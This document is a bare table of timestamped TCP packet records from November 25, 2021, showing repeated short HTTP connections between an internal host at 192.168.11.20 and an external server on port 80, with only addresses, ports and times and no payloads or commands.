Nov 25, 2021 10:52:29.299696922 CET	80	50354	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:29.654483080 CET	50355	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:29.687947989 CET	80	50355	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:29.688122034 CET	50355	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:29.689702988 CET	50355	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:29.723176956 CET	80	50355	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:29.723548889 CET	50355	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:29.757071972 CET	80	50355	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:29.779525995 CET	80	50355	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:29.779583931 CET	80	50355	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:29.779747009 CET	50355	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:29.779894114 CET	50355	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:29.813088894 CET	80	50355	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:30.125145912 CET	50356	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:30.158935070 CET	80	50356	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:30.159230947 CET	50356	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:30.160809040 CET	50356	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:30.194578886 CET	80	50356	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:30.194834948 CET	50356	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:30.228662014 CET	80	50356	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:30.252974033 CET	80	50356	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:30.252998114 CET	80	50356	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:30.253217936 CET	50356	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:30.253237963 CET	50356	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:30.287221909 CET	80	50356	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:30.648740053 CET	50357	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:30.682256937 CET	80	50357	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:30.682442904 CET	50357	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:30.684075117 CET	50357	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:30.717514992 CET	80	50357	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:30.717711926 CET	50357	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:30.751162052 CET	80	50357	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:30.771226883 CET	80	50357	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:30.771281958 CET	80	50357	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:30.771483898 CET	50357	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:30.771539927 CET	50357	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:30.804960012 CET	80	50357	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:31.096915007 CET	50358	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:31.130124092 CET	80	50358	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:31.130264997 CET	50358	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:31.132268906 CET	50358	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:31.165431976 CET	80	50358	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:31.165750980 CET	50358	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:31.199083090 CET	80	50358	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:31.228099108 CET	80	50358	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:31.228122950 CET	80	50358	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:31.228292942 CET	50358	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:31.228316069 CET	50358	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:31.261650085 CET	80	50358	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:31.607774019 CET	50359	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:31.641777039 CET	80	50359	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:31.642064095 CET	50359	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:31.643580914 CET	50359	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:31.677583933 CET	80	50359	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:31.677800894 CET	50359	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:31.711976051 CET	80	50359	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:31.736886024 CET	80	50359	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:31.736957073 CET	80	50359	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:31.737260103 CET	50359	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:31.737361908 CET	50359	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:31.771646023 CET	80	50359	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:32.132922888 CET	50360	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:32.167059898 CET	80	50360	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:32.167265892 CET	50360	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:32.168792963 CET	50360	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:32.202871084 CET	80	50360	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:32.203115940 CET	50360	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:32.237330914 CET	80	50360	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:32.253784895 CET	80	50360	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:32.253849030 CET	80	50360	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:32.254160881 CET	50360	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:32.254271984 CET	50360	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:32.288592100 CET	80	50360	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:32.667830944 CET	50361	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:32.701833963 CET	80	50361	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:32.702029943 CET	50361	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:32.703571081 CET	50361	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:32.737550974 CET	80	50361	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:32.737766981 CET	50361	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:32.771792889 CET	80	50361	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:32.796001911 CET	80	50361	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:32.796078920 CET	80	50361	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:32.796220064 CET	50361	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:32.796256065 CET	50361	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:32.830280066 CET	80	50361	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:33.130045891 CET	50362	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:33.163311958 CET	80	50362	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:33.163500071 CET	50362	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:33.165057898 CET	50362	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:33.198369980 CET	80	50362	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:33.198584080 CET	50362	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:33.231901884 CET	80	50362	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:33.247881889 CET	80	50362	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:33.247935057 CET	80	50362	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:33.248152971 CET	50362	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:33.248200893 CET	50362	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:33.281589985 CET	80	50362	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:33.640089035 CET	50363	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:33.674160004 CET	80	50363	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:33.674731016 CET	50363	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:33.675960064 CET	50363	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:33.709974051 CET	80	50363	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:33.710185051 CET	50363	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:33.744174957 CET	80	50363	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:33.761866093 CET	80	50363	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:33.761921883 CET	80	50363	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:33.762197971 CET	50363	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:33.762298107 CET	50363	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:33.796437025 CET	80	50363	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:34.152817011 CET	50364	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:34.186979055 CET	80	50364	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:34.187294006 CET	50364	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:34.188796043 CET	50364	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:34.222781897 CET	80	50364	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:34.223037958 CET	50364	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:34.257050037 CET	80	50364	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:34.276300907 CET	80	50364	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:34.276349068 CET	80	50364	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:34.276844978 CET	50364	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:34.276885986 CET	50364	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:34.310992956 CET	80	50364	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:34.667156935 CET	50365	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:34.700553894 CET	80	50365	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:34.700803995 CET	50365	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:34.702326059 CET	50365	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:34.735635996 CET	80	50365	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:34.735831976 CET	50365	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:34.769351959 CET	80	50365	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:34.792382956 CET	80	50365	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:34.792448044 CET	80	50365	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:34.792752028 CET	50365	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:34.792851925 CET	50365	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:34.826411009 CET	80	50365	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:35.174565077 CET	50366	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:35.208848000 CET	80	50366	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:35.209065914 CET	50366	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:35.210581064 CET	50366	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:35.244579077 CET	80	50366	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:35.244793892 CET	50366	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:35.278945923 CET	80	50366	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:35.300080061 CET	80	50366	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:35.300143957 CET	80	50366	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:35.300430059 CET	50366	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:35.300542116 CET	50366	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:35.334800959 CET	80	50366	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:35.653434038 CET	50367	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:35.686836004 CET	80	50367	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:35.687000990 CET	50367	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:35.688599110 CET	50367	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:35.722001076 CET	80	50367	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:35.722184896 CET	50367	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:35.755471945 CET	80	50367	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:35.772387981 CET	80	50367	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:35.772439003 CET	80	50367	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:35.772747040 CET	50367	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:35.772805929 CET	50367	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:35.806171894 CET	80	50367	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:36.130153894 CET	50368	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:36.164447069 CET	80	50368	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:36.164819002 CET	50368	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:36.166352034 CET	50368	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:36.200341940 CET	80	50368	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:36.200638056 CET	50368	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:36.234549999 CET	80	50368	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:36.252363920 CET	80	50368	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:36.252413034 CET	80	50368	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:36.252613068 CET	50368	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:36.252665997 CET	50368	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:36.286808014 CET	80	50368	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:36.631633043 CET	50369	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:36.665651083 CET	80	50369	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:36.665893078 CET	50369	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:36.667413950 CET	50369	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:36.700795889 CET	80	50369	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:36.700978041 CET	50369	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:36.734585047 CET	80	50369	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:36.750554085 CET	80	50369	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:36.750617027 CET	80	50369	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:36.750802994 CET	50369	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:36.750900030 CET	50369	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:36.784550905 CET	80	50369	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:37.142591000 CET	50370	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:37.175811052 CET	80	50370	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:37.176021099 CET	50370	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:37.177629948 CET	50370	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:37.210858107 CET	80	50370	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:37.211122990 CET	50370	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:37.244426966 CET	80	50370	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:37.260508060 CET	80	50370	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:37.260562897 CET	80	50370	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:37.260883093 CET	50370	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:37.260968924 CET	50370	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:37.294676065 CET	80	50370	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:37.648408890 CET	50371	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:37.682532072 CET	80	50371	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:37.682852983 CET	50371	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:37.684361935 CET	50371	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:37.718259096 CET	80	50371	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:37.718498945 CET	50371	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:37.752341032 CET	80	50371	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:37.768307924 CET	80	50371	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:37.768357038 CET	80	50371	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:37.768543005 CET	50371	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:37.768590927 CET	50371	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:37.802781105 CET	80	50371	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:38.165143013 CET	50372	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:38.199261904 CET	80	50372	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:38.199477911 CET	50372	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:38.201109886 CET	50372	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:38.235028028 CET	80	50372	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:38.235380888 CET	50372	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:38.269328117 CET	80	50372	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:38.293354034 CET	80	50372	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:38.293401957 CET	80	50372	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:38.293592930 CET	50372	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:38.293639898 CET	50372	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:38.327577114 CET	80	50372	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:38.641273975 CET	50373	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:38.675113916 CET	80	50373	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:38.675445080 CET	50373	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:38.676992893 CET	50373	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:38.710798025 CET	80	50373	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:38.711014986 CET	50373	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:38.744743109 CET	80	50373	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:38.760119915 CET	80	50373	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:38.760190964 CET	80	50373	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:38.760344982 CET	50373	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:38.760360003 CET	50373	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:38.794228077 CET	80	50373	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:39.106539011 CET	50374	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:39.140651941 CET	80	50374	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:39.140856028 CET	50374	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:39.142414093 CET	50374	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:39.176434040 CET	80	50374	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:39.176614046 CET	50374	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:39.210762978 CET	80	50374	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:39.230204105 CET	80	50374	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:39.230258942 CET	80	50374	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:39.230570078 CET	50374	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:39.230653048 CET	50374	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:39.264962912 CET	80	50374	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:39.584671974 CET	50375	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:39.618012905 CET	80	50375	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:39.618253946 CET	50375	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:39.619721889 CET	50375	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:39.653081894 CET	80	50375	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:39.653296947 CET	50375	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:39.686748981 CET	80	50375	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:39.732794046 CET	80	50375	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:39.732866049 CET	80	50375	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:39.733166933 CET	50375	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:39.733272076 CET	50375	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:39.766906977 CET	80	50375	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:40.131980896 CET	50376	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:40.165468931 CET	80	50376	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:40.165756941 CET	50376	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:40.167311907 CET	50376	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:40.200659990 CET	80	50376	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:40.200833082 CET	50376	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:40.234354019 CET	80	50376	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:40.250220060 CET	80	50376	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:40.250281096 CET	80	50376	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:40.250427008 CET	50376	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:40.250483036 CET	50376	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:40.284070015 CET	80	50376	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:40.632379055 CET	50377	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:40.666507959 CET	80	50377	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:40.666773081 CET	50377	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:40.668286085 CET	50377	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:40.702269077 CET	80	50377	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:40.702511072 CET	50377	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:40.736520052 CET	80	50377	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:40.755194902 CET	80	50377	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:40.755244017 CET	80	50377	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:40.755486012 CET	50377	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:40.755534887 CET	50377	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:40.789629936 CET	80	50377	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:41.133286953 CET	50378	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:41.167152882 CET	80	50378	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:41.167331934 CET	50378	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:41.168891907 CET	50378	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:41.202931881 CET	80	50378	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:41.203107119 CET	50378	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:41.237143040 CET	80	50378	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:41.253366947 CET	80	50378	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:41.253381014 CET	80	50378	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:41.253597975 CET	50378	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:41.253693104 CET	50378	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:41.287625074 CET	80	50378	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:41.579087973 CET	50379	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:41.612267017 CET	80	50379	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:41.612406015 CET	50379	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:41.613993883 CET	50379	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:41.647149086 CET	80	50379	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:41.647304058 CET	50379	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:41.680552006 CET	80	50379	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:41.702423096 CET	80	50379	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:41.702440023 CET	80	50379	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:41.702828884 CET	50379	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:41.702841043 CET	50379	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:41.736001968 CET	80	50379	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:42.091557026 CET	50380	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:42.125597000 CET	80	50380	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:42.125897884 CET	50380	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:42.127399921 CET	50380	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:42.161402941 CET	80	50380	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:42.161623955 CET	50380	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:42.195693970 CET	80	50380	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:42.215949059 CET	80	50380	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:42.216001034 CET	80	50380	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:42.216191053 CET	50380	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:42.216250896 CET	50380	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:42.250281096 CET	80	50380	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:42.592432022 CET	50381	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:42.625706911 CET	80	50381	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:42.625900030 CET	50381	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:42.627468109 CET	50381	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:42.660851002 CET	80	50381	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:42.661046028 CET	50381	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:42.694406033 CET	80	50381	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:42.715389967 CET	80	50381	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:42.715409994 CET	80	50381	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:42.715636969 CET	50381	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:42.715656042 CET	50381	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:42.749053001 CET	80	50381	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:43.100537062 CET	50382	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:43.134601116 CET	80	50382	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:43.134855986 CET	50382	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:43.136375904 CET	50382	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:43.170532942 CET	80	50382	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:43.170875072 CET	50382	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:43.204967976 CET	80	50382	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:43.228360891 CET	80	50382	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:43.228415966 CET	80	50382	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:43.228688002 CET	50382	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:43.228770018 CET	50382	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:43.263101101 CET	80	50382	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:43.588382006 CET	50383	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:43.622538090 CET	80	50383	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:43.622673988 CET	50383	80	192.168.11.20	176.223.209.128
